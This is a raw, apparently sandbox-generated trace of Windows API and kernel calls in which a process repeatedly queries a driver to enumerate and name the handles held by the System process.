[0200.015] ObQueryNameString (in: Object=0xfffffa80039179a0, ObjectNameInfo=0xfffffa800315a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.015] ObfDereferenceObject (Object=0xfffffa80039179a0) returned 0x2 [0200.015] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.015] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.015] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.015] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.015] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.015] PsAcquireProcessExitSynchronization () returned 0x0 [0200.015] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.015] ObReferenceObjectByHandle (in: Handle=0xffffffff80000620, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f93780, HandleInformation=0x0) returned 0x0 [0200.015] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.015] PsReleaseProcessExitSynchronization () returned 0x2 [0200.015] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.015] ObQueryNameString (in: Object=0xfffffa8001f93780, ObjectNameInfo=0xfffffa8003131044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003131044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.015] ObfDereferenceObject (Object=0xfffffa8001f93780) returned 0x2 [0200.015] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.015] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.015] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.015] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.016] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.016] PsAcquireProcessExitSynchronization () returned 0x0 [0200.016] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.016] ObReferenceObjectByHandle (in: Handle=0xffffffff80000624, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed6f20, HandleInformation=0x0) returned 0x0 [0200.016] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.016] PsReleaseProcessExitSynchronization () returned 0x2 [0200.016] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.016] ObQueryNameString (in: Object=0xfffffa8001ed6f20, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.016] ObfDereferenceObject (Object=0xfffffa8001ed6f20) returned 0x2 [0200.016] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.016] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.016] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.016] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.016] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.016] PsAcquireProcessExitSynchronization () returned 0x0 [0200.016] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.016] ObReferenceObjectByHandle (in: Handle=0xffffffff80000628, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f91350, HandleInformation=0x0) returned 0x0 [0200.017] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.017] PsReleaseProcessExitSynchronization () returned 0x2 [0200.017] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.017] ObQueryNameString (in: Object=0xfffffa8001f91350, ObjectNameInfo=0xfffffa800313e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800313e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.017] ObfDereferenceObject (Object=0xfffffa8001f91350) returned 0x2 [0200.017] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.017] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.017] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.017] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.017] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.017] PsAcquireProcessExitSynchronization () returned 0x0 [0200.017] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.018] ObReferenceObjectByHandle (in: Handle=0xffffffff80000630, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f92680, HandleInformation=0x0) returned 0x0 [0200.018] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.018] PsReleaseProcessExitSynchronization () returned 0x2 [0200.018] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.018] ObQueryNameString (in: Object=0xfffffa8001f92680, ObjectNameInfo=0xfffffa8003147044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003147044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.018] ObfDereferenceObject (Object=0xfffffa8001f92680) returned 0x2 [0200.018] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.018] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.018] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.018] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.018] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.018] PsAcquireProcessExitSynchronization () returned 0x0 [0200.018] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.019] ObReferenceObjectByHandle (in: Handle=0xffffffff80000634, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed57c0, HandleInformation=0x0) returned 0x0 [0200.019] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.019] PsReleaseProcessExitSynchronization () returned 0x2 [0200.019] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.019] ObQueryNameString (in: Object=0xfffffa8001ed57c0, ObjectNameInfo=0xfffffa8003148044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003148044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.019] ObfDereferenceObject (Object=0xfffffa8001ed57c0) returned 0x2 [0200.019] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.019] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.019] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.019] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.019] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.019] PsAcquireProcessExitSynchronization () returned 0x0 [0200.019] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.020] ObReferenceObjectByHandle (in: Handle=0xffffffff80000638, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f91af0, HandleInformation=0x0) returned 0x0 [0200.020] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.020] PsReleaseProcessExitSynchronization () returned 0x2 [0200.020] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.020] ObQueryNameString (in: Object=0xfffffa8001f91af0, ObjectNameInfo=0xfffffa800314b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.020] ObfDereferenceObject (Object=0xfffffa8001f91af0) returned 0x2 [0200.020] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.020] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.020] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.020] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.020] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.020] PsAcquireProcessExitSynchronization () returned 0x0 [0200.020] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.020] ObReferenceObjectByHandle (in: Handle=0xffffffff8000063c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a4ebc0, HandleInformation=0x0) returned 0x0 [0200.021] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.021] PsReleaseProcessExitSynchronization () returned 0x2 [0200.021] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.021] ObQueryNameString (in: Object=0xfffffa8003a4ebc0, ObjectNameInfo=0xfffffa800314f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.021] ObfDereferenceObject (Object=0xfffffa8003a4ebc0) returned 0x2 [0200.021] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.022] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.022] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.022] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.022] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.022] PsAcquireProcessExitSynchronization () returned 0x0 [0200.022] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.022] ObReferenceObjectByHandle (in: Handle=0xffffffff80000640, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f91550, HandleInformation=0x0) returned 0x0 [0200.022] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.022] PsReleaseProcessExitSynchronization () returned 0x2 [0200.022] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.022] ObQueryNameString (in: Object=0xfffffa8001f91550, ObjectNameInfo=0xfffffa8003150044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003150044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.022] ObfDereferenceObject (Object=0xfffffa8001f91550) returned 0x2 [0200.022] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.023] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.023] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.023] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.023] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.023] PsAcquireProcessExitSynchronization () returned 0x0 [0200.023] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.023] ObReferenceObjectByHandle (in: Handle=0xffffffff80000644, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed5e50, HandleInformation=0x0) returned 0x0 [0200.023] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.023] PsReleaseProcessExitSynchronization () returned 0x2 [0200.023] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.023] ObQueryNameString (in: Object=0xfffffa8001ed5e50, ObjectNameInfo=0xfffffa8003152044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003152044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.023] ObfDereferenceObject (Object=0xfffffa8001ed5e50) returned 0x2 [0200.024] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.024] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.024] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.024] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.024] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.024] PsAcquireProcessExitSynchronization () returned 0x0 [0200.024] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.024] ObReferenceObjectByHandle (in: Handle=0xffffffff80000648, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f90860, HandleInformation=0x0) returned 0x0 [0200.024] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.024] PsReleaseProcessExitSynchronization () returned 0x2 [0200.024] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.024] ObQueryNameString (in: Object=0xfffffa8001f90860, ObjectNameInfo=0xfffffa8003153044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003153044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.025] ObfDereferenceObject (Object=0xfffffa8001f90860) returned 0x2 [0200.025] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.025] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.025] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.025] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0200.025] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.025] PsAcquireProcessExitSynchronization () returned 0x0 [0200.025] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.025] ObReferenceObjectByHandle (in: Handle=0xffffffff8000064c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a18d00, HandleInformation=0x0) returned 0x0 [0200.025] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.025] PsReleaseProcessExitSynchronization () returned 0x2 [0200.025] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.025] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003154044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003154044, ReturnLength=0xfffff880052b3508) returned 0x0 [0200.026] ObfDereferenceObject (Object=0xfffffa8003a18d00) returned 0x1 [0200.026] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.026] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.026] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.026] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.026] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.026] PsAcquireProcessExitSynchronization () returned 0x0 [0200.026] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.026] ObReferenceObjectByHandle (in: Handle=0xffffffff80000650, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f902c0, HandleInformation=0x0) returned 0x0 [0200.026] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.026] PsReleaseProcessExitSynchronization () returned 0x2 [0200.026] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.026] ObQueryNameString (in: Object=0xfffffa8001f902c0, ObjectNameInfo=0xfffffa8003155044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003155044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.026] ObfDereferenceObject (Object=0xfffffa8001f902c0) returned 0x2 [0200.026] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.027] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.027] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.027] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.027] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.027] PsAcquireProcessExitSynchronization () returned 0x0 [0200.027] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.027] ObReferenceObjectByHandle (in: Handle=0xffffffff80000658, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8f660, HandleInformation=0x0) returned 0x0 [0200.027] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.027] PsReleaseProcessExitSynchronization () returned 0x2 [0200.027] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.027] ObQueryNameString (in: Object=0xfffffa8001f8f660, ObjectNameInfo=0xfffffa8003156044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003156044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.027] ObfDereferenceObject (Object=0xfffffa8001f8f660) returned 0x2 [0200.027] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.028] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.028] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.028] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.028] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.028] PsAcquireProcessExitSynchronization () returned 0x0 [0200.028] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.028] ObReferenceObjectByHandle (in: Handle=0xffffffff80000660, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f90050, HandleInformation=0x0) returned 0x0 [0200.028] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.028] PsReleaseProcessExitSynchronization () returned 0x2 [0200.028] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.028] ObQueryNameString (in: Object=0xfffffa8001f90050, ObjectNameInfo=0xfffffa8003157044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003157044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.028] ObfDereferenceObject (Object=0xfffffa8001f90050) returned 0x2 [0200.029] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.029] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.029] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.029] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.029] PsAcquireProcessExitSynchronization () returned 0x0 [0200.029] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.029] ObReferenceObjectByHandle (in: Handle=0xffffffff80000668, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f8e590, HandleInformation=0x0) returned 0x0 [0200.029] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.029] PsReleaseProcessExitSynchronization () returned 0x2 [0200.029] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.029] ObQueryNameString (in: Object=0xfffffa8001f8e590, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.030] ObfDereferenceObject (Object=0xfffffa8001f8e590) returned 0x2 [0200.030] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.030] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 